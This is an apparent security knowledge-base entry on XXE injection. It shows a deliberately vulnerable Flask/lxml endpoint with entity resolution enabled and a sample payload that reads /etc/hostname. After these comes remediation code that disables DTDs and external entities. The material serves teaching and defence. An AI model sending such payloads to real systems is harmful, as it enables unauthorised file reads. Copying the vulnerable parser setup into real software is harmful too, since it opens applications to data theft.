
A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files

License: GNU Affero General Public License v3.0 (AGPL-3.0)


Example #1

  1. Threat actor sends a malicious request whose XML carries a DTD that declares an external entity (an entity with a system identifier, e.g. a file:// URL)
  2. The target's XML processor resolves the external entity and replaces each reference to it with the content fetched from the system identifier, which is then returned in the response

Code

Target Logic

from flask import Flask, request, make_response
from lxml import etree

app = Flask(__name__)

@app.route("/parse_xml", methods=["POST"])
def parse_xml():
    # Vulnerable on purpose: resolve_entities=True lets lxml expand
    # external entities (SYSTEM identifiers) declared in the request's DTD
    parser = etree.XMLParser(resolve_entities=True)
    root = etree.fromstring(request.files['xml'].read(), parser)
    # The expanded document is echoed back, so resolved entity content is returned to the sender
    response = make_response(etree.tostring(root), 200)
    response.mimetype = "text/plain"
    return response

Target-in

<?xml version="1.0" encoding="UTF-8"?>
<getLastName>John01</getLastName>

Target-Out

Jone Doe

Target-in

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE malicious [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<getInfo>&xxe;</getInfo>

Target-Out

usystem01

Impact

High

Names

  • XXE injection
  • XEE injection
  • XML injection

Risk

  • Read data

Remediation

  • Configure the XML processor for secure processing (no resolution of entities the application does not need)
  • Disable DTD processing and XML external entity resolution in the parser
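The remediation above, worked through as an added example that is not part of this entry: a parser configured to refuse external entity resolution, plus a pre-parse guard that rejects any document carrying a DOCTYPE. It uses Python's standard-library xml.sax (rather than the lxml used in the Target Logic) so it runs without third-party packages; the two sample documents are constructed copies of the Target-in requests shown above, and the function and class names are this example's own.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample inputs, modelled on the two Target-in documents above.
BENIGN_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<getLastName>John01</getLastName>"""

XXE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE malicious [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<getInfo>&xxe;</getInfo>"""

# Defence in depth: this API never needs a DTD, so any DOCTYPE (and with it
# any entity declaration) is rejected before the parser sees the document.
# The check runs on raw bytes, so it only sees ASCII-compatible encodings;
# the parser feature below is the control that must hold regardless.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def has_doctype(data: bytes) -> bool:
    """Return True if the raw document carries a DOCTYPE declaration."""
    return _DOCTYPE_RE.search(data) is not None


class _TextCollector(ContentHandler):
    """Collect the root element's name and all character data (hypothetical helper)."""

    def __init__(self):
        super().__init__()
        self.root = None
        self.text = []

    def startElement(self, name, attrs):
        if self.root is None:
            self.root = name

    def characters(self, content):
        self.text.append(content)


def parse_untrusted(data: bytes, allow_dtd: bool = False):
    """Parse XML with external general entities disabled.

    Returns (root_element_name, text). Raises ValueError when the document
    carries a DOCTYPE and allow_dtd is False.
    """
    if not allow_dtd and has_doctype(data):
        raise ValueError("DOCTYPE declarations are not accepted")
    parser = xml.sax.make_parser()
    # Turn off fetching of external general entities (SYSTEM identifiers such
    # as file:///...). This has been the default since Python 3.7.1, but
    # setting it explicitly records the intent and survives a changed default.
    parser.setFeature(feature_external_ges, False)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return handler.root, "".join(handler.text)


if __name__ == "__main__":
    print(parse_untrusted(BENIGN_XML))          # ('getLastName', 'John01')
    try:
        parse_untrusted(XXE_XML)
    except ValueError as exc:
        print("rejected:", exc)
    # Even if the DOCTYPE guard were bypassed, the entity is not resolved:
    print(parse_untrusted(XXE_XML, allow_dtd=True))  # ('getInfo', '')
```

With `allow_dtd=True` the malicious document still parses, but `&xxe;` expands to nothing because the parser never dereferences the system identifier; that is the behaviour to verify in tests after hardening. The equivalent change for the lxml-based Target Logic is to construct the parser as `etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)` instead of `resolve_entities=True`.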

ID

4b3566ce-3f7f-40d8-b882-09f59ca967b8

References